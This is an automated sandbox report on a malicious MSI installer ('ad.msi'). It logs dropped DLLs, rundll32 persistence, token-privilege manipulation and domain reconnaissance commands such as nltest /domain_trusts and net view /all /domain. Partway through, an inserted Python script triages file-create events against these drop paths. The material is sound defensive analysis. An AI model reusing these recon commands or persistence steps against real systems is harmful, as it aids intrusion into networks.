                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180052FD86_2_0000000180052FD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003AFE86_2_000000018003AFE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005D0146_2_000000018005D014
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006F0B46_2_000000018006F0B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800630CC6_2_00000001800630CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005912C6_2_000000018005912C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A46_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800492786_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007B2D06_2_000000018007B2D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B2EC6_2_000000018002B2EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006D3D46_2_000000018006D3D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E06_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800754806_2_0000000180075480
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800694A06_2_00000001800694A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005958C6_2_000000018005958C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800576DC6_2_00000001800576DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800097E06_2_00000001800097E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800277FC6_2_00000001800277FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002D9646_2_000000018002D964
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073B606_2_0000000180073B60
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007BBB06_2_000000018007BBB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001BC386_2_000000018001BC38
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005DD186_2_000000018005DD18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073DF06_2_0000000180073DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180011DF06_2_0000000180011DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005BE6C6_2_000000018005BE6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004FF886_2_000000018004FF88
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB710306_2_000001FB3AB71030
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A410307_2_0000024739A41030
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA010308_2_00000210FEA01030
                      Source: Joe Sandbox ViewDropped File: :wtfbbq (copy) 1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSID3EB.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018000CF30 appears 33 times
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005348 appears 71 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B43292 appears 70 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B43790 appears 39 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B4325F appears 103 times
                      Source: ad.msiBinary or memory string: OriginalFilenameviewer.exeF vs ad.msi
                      Source: ad.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs ad.msi
                      Source: classification engineClassification label: mal100.spre.troj.evad.winMSI@38/31@2/2
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 6_2_0000000180049050
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 6_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 6_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 6_2_000000018008395A
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B23860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,FindCloseChangeNotification,Process32NextW,CloseHandle, 5_2_00B23860
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B24BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 5_2_00B24BA0
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B245B0 LoadResource,LockResource,SizeofResource, 5_2_00B245B0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 6_2_0000000180049AEC
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\CMLD87F.tmp
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runnung
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3EB.tmp
                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Installer\MSID8B1.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: rundll32.exe, rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | Binary or memory string: select * from sqlite_sequence;
                      Source: rundll32.exe, rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
                      Source: ad.msi | Virustotal: Detection: 8%
                      Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
                      Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C
                      Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583
                      Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSID8B1.tmp "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c systeminfo
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\systeminfo.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: srpapi.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: textinputframework.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: textshaping.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: msihnd.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: dwmapi.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Section loaded: uxtheme.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Section loaded: sxs.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: esscli.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: ntdsapi.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: logoncli.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\nltest.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: browcli.dll
                      Source: C:\Windows\System32\net.exe | Section loaded: cscapi.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: ad.msi | Static file information: File size 1619456 > 1048576
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 6_2_00000001800033E0
                      Source: Update_77697333.dll.6.dr | Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.1.dr | Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.1.dr | Static PE information: section name: yhDm^
                      Source: Update_77697333.dll.6.dr | Static PE information: section name: yhDm^
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B4323C push ecx; ret 5_2_00B4324F
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180010451 push rcx; ret 6_2_0000000180010452
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001045A push rcx; ret 6_2_000000018001045B
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018017500F push rdx; iretd 6_2_0000000180175010

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSID8B1.tmp
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID529.tmp
                      Source: C:\Windows\System32\rundll32.exe | File created: :wtfbbq (copy)
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\sharepoint\360total.dll
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID4D9.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID8B1.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID69B.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID719.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID509.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID4B9.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3EB.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID498.tmp
                      Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,6_2_0000000180062148
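The file drops listed above are the cheapest point to catch this sample: the persistence DLL under AppData\Roaming\Custom_update is written by rundll32.exe, a host process that never legitimately writes executables, and the report itself notes it was not started during analysis, so a file-create rule fires before any execution does. The following is an added example, not part of the Joe Sandbox report: it runs three rules over Sysmon-style file-create events constructed from the paths above. The writer-to-target pairing follows the report, the benign setup.exe entry is an assumption, and ":wtfbbq" is reproduced as the report prints it, minus the "(copy)" suffix, and treated as a stream name.

```python
"""Triage file-create events against the drop locations in the report.
Added example, not from the report; events are constructed from the
paths it lists. The setup.exe event is an assumed benign control."""
import re
from collections import defaultdict

# Drop locations observed in this sample (from the report's File created lines).
KNOWN_DROP_PATHS = [
    re.compile(r"\\AppData\\Roaming\\Custom_update\\Update_\d+\.dll$", re.IGNORECASE),
    re.compile(r"\\AppData\\Local\\sharepoint\\360total\.dll$", re.IGNORECASE),
]
EXECUTABLE_EXT = (".dll", ".exe")
# Script/DLL hosts that have no business writing executables anywhere.
NO_WRITE_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}

# Constructed Sysmon EventID 11 style events: (writer image, target filename).
EVENTS = [
    (r"C:\Windows\System32\msiexec.exe", r"C:\Users\user\AppData\Local\Temp\MSID529.tmp"),
    (r"C:\Windows\System32\msiexec.exe", r"C:\Users\user\AppData\Local\sharepoint\360total.dll"),
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\Installer\MSID8B1.tmp"),
    (r"C:\Windows\System32\rundll32.exe", r"C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll"),
    (r"C:\Windows\System32\rundll32.exe", r":wtfbbq"),  # as printed in the report, "(copy)" dropped
    (r"C:\Program Files\ExampleApp\setup.exe", r"C:\Users\user\AppData\Local\Temp\helper.dll"),  # assumed benign
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_alternate_stream(target):
    """A colon in the final path component (after any drive letter) names an NTFS ADS."""
    no_drive = re.sub(r"^[A-Za-z]:", "", target)
    return ":" in basename(no_drive)


def triage_file_drops(events):
    """Return {target: [reasons]} for every event that trips at least one rule."""
    findings = defaultdict(list)
    for writer, target in events:
        writer_name = basename(writer).lower()
        # Rule 1: a DLL host wrote a PE file. msiexec writing into AppData is ordinary
        # per-user installer behaviour, so it is deliberately not covered here.
        if writer_name in NO_WRITE_HOSTS and target.lower().endswith(EXECUTABLE_EXT):
            findings[target].append(f"{writer_name} wrote an executable")
        # Rule 2: path-based IOC from this report.
        if any(p.search(target) for p in KNOWN_DROP_PATHS):
            findings[target].append("matches a drop path observed in this sample")
        # Rule 3: content hidden in an alternate data stream.
        if is_alternate_stream(target):
            findings[target].append("written to an alternate data stream")
    return dict(findings)


if __name__ == "__main__":
    for target, reasons in triage_file_drops(EVENTS).items():
        print(target, "->", "; ".join(reasons))
```

Rule 1 is the durable one: the Custom_update path and the 360total.dll name are specific to this sample and will rotate, while rundll32.exe writing a .dll into a user profile stays anomalous across campaigns. The .tmp drops under C:\Windows\Installer are untouched by these rules because that is where msiexec stages any MSI's payload; distinguishing them needs the PE header or a hash, not the path.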
                      Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)
                      Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (7 occurrences)
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
                      Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\rundll32.exe | Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,6_2_00000001800655A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049AEC
                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,6_2_000001FB3AB768E8
